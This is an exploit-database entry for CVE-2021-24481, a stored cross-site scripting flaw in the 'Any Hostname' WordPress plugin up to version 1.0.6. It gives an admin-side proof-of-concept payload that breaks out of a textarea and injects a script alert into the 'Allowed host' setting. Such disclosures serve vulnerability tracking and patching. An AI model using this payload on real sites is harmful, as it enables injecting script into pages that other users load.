Exploit for Any Hostname <= 1.0.6 - Authenticated Stored Cross-Site Scripting (XSS) CVE-2021-24481

Name: Exploit for Any Hostname <= 1.0.6 - Authenticated Stored Cross-Site Scripting (XSS) CVE-2021-24481
Rating: 5 (77 reviews)

2021-06-28 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:A4C352DE-9815-4DFE-AC51-65B5BFB37438
As admin, put the following payload in the "Allowed host" setting of the plugin (/wp-admin/options-general.php#any-hostname): </textarea><script>alert(/XSS/)</script>